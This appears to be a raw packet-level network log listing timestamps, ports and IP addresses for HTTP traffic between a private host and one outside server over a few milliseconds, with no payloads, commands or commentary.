Sep 27, 2024 00:15:05.608382940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608383894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608417034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608431101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608449936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608469963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608483076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608500957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608516932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608530045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608549118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608568907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608582020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608588934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608613014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608627081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608644962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608649015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608675003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608695984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608707905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608717918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608741045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608752966 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608772993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608783007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608804941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608817101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608835936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608850956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608869076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608872890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608901978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608932018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608932972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608957052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608964920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.608974934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.608998060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609008074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609030008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609031916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609059095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609071970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609090090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609097958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609122992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609138966 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609154940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609173059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609205961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609241962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609287977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609292984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609333038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609338045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609364986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609378099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609395981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609406948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609435081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609443903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609477997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609488964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609510899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609533072 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609541893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609550953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609574080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609587908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609617949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609621048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609652996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609667063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609699965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609699965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609731913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609744072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609778881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609791994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609808922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609817982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.609832048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609855890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.609996080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.610039949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.610506058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.610558987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.610938072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.610986948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.610991001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611023903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611037016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611072063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611074924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611119032 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611121893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611155987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611169100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611187935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611197948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611227036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611228943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611258030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611272097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611295938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611309052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611354113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611356974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611396074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611412048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611443996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611457109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611478090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611486912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611519098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611525059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611567974 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611577034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611609936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611619949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611641884 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611644030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611686945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611692905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611726999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611737013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611773968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611802101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611835003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611848116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611866951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611877918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611900091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611931086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611936092 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611951113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611963987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.611968994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.611994982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612026930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612029076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612054110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612059116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612083912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612092018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612101078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612123966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612133980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612157106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612162113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612190008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612196922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612229109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612230062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612261057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612293005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612298965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612320900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612338066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612351894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612360954 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612385035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612392902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612416983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612427950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612451077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612459898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612483978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612483978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612518072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612531900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612549067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612576008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612581968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612592936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612615108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612628937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612648010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612653971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612679005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612695932 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612710953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612724066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612741947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612756968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612762928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612777948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612787962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612801075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612807989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612813950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612827063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612839937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612853050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612859011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612867117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612880945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612881899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612898111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612901926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612916946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612931967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612946987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612961054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612976074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612984896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612984896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612984896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612984896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612986088 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.612989902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.612998962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613003969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613018036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613028049 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613032103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613045931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613045931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613045931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613059998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613070011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613073111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613085985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613091946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613101006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613116026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613122940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613122940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613122940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613131046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613145113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613157034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613158941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613173008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613183022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613183022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613187075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613198996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613202095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613217115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613229990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613230944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613243103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613256931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613261938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613265038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613277912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613282919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613291025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613291025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613306046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613320112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613325119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613325119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613325119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613334894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613348007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613348961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613363028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613377094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613389969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613403082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613416910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613424063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613424063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613430023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613444090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613456964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613464117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613464117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613464117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613464117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613464117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613471031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613477945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613485098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613487959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613498926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613509893 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613512993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613526106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613544941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613544941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613569021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613569021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613589048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613601923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613615990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613620043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613630056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613643885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613650084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613651037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613658905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613662004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613673925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613676071 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613687992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613687992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613701105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613702059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613715887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613715887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613729954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613730907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613742113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613742113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613755941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613756895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613765955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613770008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613781929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613782883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613797903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613797903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613811016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613812923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613818884 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613826036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613832951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613840103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613847017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613859892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613873959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613888025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613897085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613897085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613897085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.613902092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613914967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613929987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.613944054 CEST	80	49708	46.8.231.109	192.168.2.5
